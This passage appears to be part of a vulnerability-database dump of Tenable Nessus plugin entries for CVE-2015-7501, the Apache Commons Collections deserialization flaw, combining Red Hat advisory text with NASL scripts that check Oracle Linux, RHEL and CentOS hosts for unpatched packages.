apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : apache-commons-collections (ELSA-2015-2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:apache-commons-collections", "p-cpe:/a:oracle:linux:apache-commons-collections-javadoc", "p-cpe:/a:oracle:linux:apache-commons-collections-testframework", "p-cpe:/a:oracle:linux:apache-commons-collections-testframework-javadoc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2522 and \n# Oracle Linux Security Advisory ELSA-2015-2522 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87119);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"Oracle Linux 7 : apache-commons-collections (ELSA-2015-2522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2522 :\n\nUpdated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005594.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:53", "description": "Updated packages that fix one security issue for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 6.3 are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat Enterprise Linux 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2536)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2015-2536.NASL", "href": "https://www.tenable.com/plugins/nessus/87191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2536. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87191);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2536\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2536)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages that fix one security issue for the Apache\ncommons-collections library for Red Hat JBoss Enterprise Application\nPlatform 6.3 are now available for Red Hat Enterprise Linux 5, 6, and\n7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections-eap6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2536\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections-eap6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:31", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-21T00:00:00", "type": "nessus", "title": "RHEL 5 : jakarta-commons-collections (RHSA-2015:2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2671. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87519);\n script_version(\"2.18\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"RHEL 5 : jakarta-commons-collections (RHSA-2015:2671)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2671\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T15:30:58", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "nessus", "title": "CentOS 6 : jakarta-commons-collections (CESA-2015:2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:jakarta-commons-collections", "p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2521 and \n# CentOS Errata and Security Advisory 2015:2521 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87174);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n 